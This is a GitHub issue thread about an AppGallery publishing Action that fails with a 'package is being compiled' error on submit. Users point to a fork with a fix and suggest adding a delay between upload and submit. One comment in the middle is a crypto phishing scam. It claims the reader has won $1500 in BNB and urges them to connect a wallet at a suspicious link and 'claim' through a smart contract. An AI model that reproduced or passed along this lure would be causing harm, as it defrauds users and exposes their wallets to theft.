### ISSUE TITLE
Error: [AppGalleryConnectPublishService]The package is being compiled, please try again in 3-5 minutes

### ISSUE THREAD

**Issue by eldawwy** [muhamedzeema/appgallery-deply-action#8]
Salam Alkom
@muhamedzeema 
the uploaded success
but submitted failed with error below
```
 Error: [AppGalleryConnectPublishService]The package is being compiled, please try again in 3-5 minutes
```
```
Run muhamedzeema/appgallery-deply-action@main
  with:
    client-id: ***
    client-key: ***
    app-id: ***
    file-extension: apk
    file-path: android/app/build/outputs/apk/release/app-release.apk
    file-name: parent-[2](****).1.1
    submit: true
     _                       ____           _   _                       
    / \     _ __    _ __    / ___|   __ _  | | | |   ___   _ __   _   _ 
   / _ \   | '_ \  | '_ \  | |  _   / _` | | | | |  / _ \ | '__| | | | |
  / ___ \  | |_) | | |_) | | |_| | | (_| | | | | | |  __/ | |    | |_| |
 /_/   \_\ | .__/  | .__/   \____|  \__,_| |_| |_|  \___| |_|     \__, |
           |_|     |_|                                            |___/ 
Obtaining a Token .... ⌛️
Get Upload URL .... ⌛️
Upload files .... ⤴️
upload successful ✅✅
Update App File Info .... ⌛️
successfully uploaded 🎉🎉🎉🎉🎉🎉
Submitting .... ⌛️
[AppGalleryConnectPublishService]The package is being compiled, please try again in [3](https://github.com/our-edu/parent-school-react/actions/runs/4043493204/jobs/6952473557#step:8:3)-[5](https://github.com/our-edu/parent-school-react/actions/runs/4043493204/jobs/6952473557#step:8:5) minutes
Error: [AppGalleryConnectPublishService]The package is being compiled, please try again in 3-5 minutes
```

**Comment by robocoder** [comment]
It looks like this was fixed in this fork:
* https://github.com/kienlv58/appgallery-deply-action/commit/e74729f02ddef1f266e1844df97810ae2265f694

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by abdlrhmanshehatamoussa** [comment]
@muhamedzeema Issue is still there
Any ideas how to fix please 🙏 
I can help fixing also if you guide me

**Comment by abdlrhmanshehatamoussa** [comment]
Maybe we need to add some delay between upload and submit

**Comment by muhamedzeema** [comment]
@abdlrhmanshehatamoussa did you tried this fork * https://github.com/kienlv58/appgallery-deply-action/commit/e74729f02ddef1f266e1844df97810ae2265f694 ?

**Comment by abdlrhmanshehatamoussa** [comment]
No, just realised this fork
Trying it now ...

**Comment by abdlrhmanshehatamoussa** [comment]
The error is no longer showing but I got another error, probably because I have an existing version in review.

I will try again after some time to test and will post the result 

Thanks for follow up 🙏

**Comment by GeceGibi** [comment]
any changes ?

**Comment by abdlrhmanshehatamoussa** [comment]
FYI, the new fork shows no error, however it doesn't automatically commit to the store.

I think that a 30s-1m delay needs to be put after uploading to be able to correctly submit.
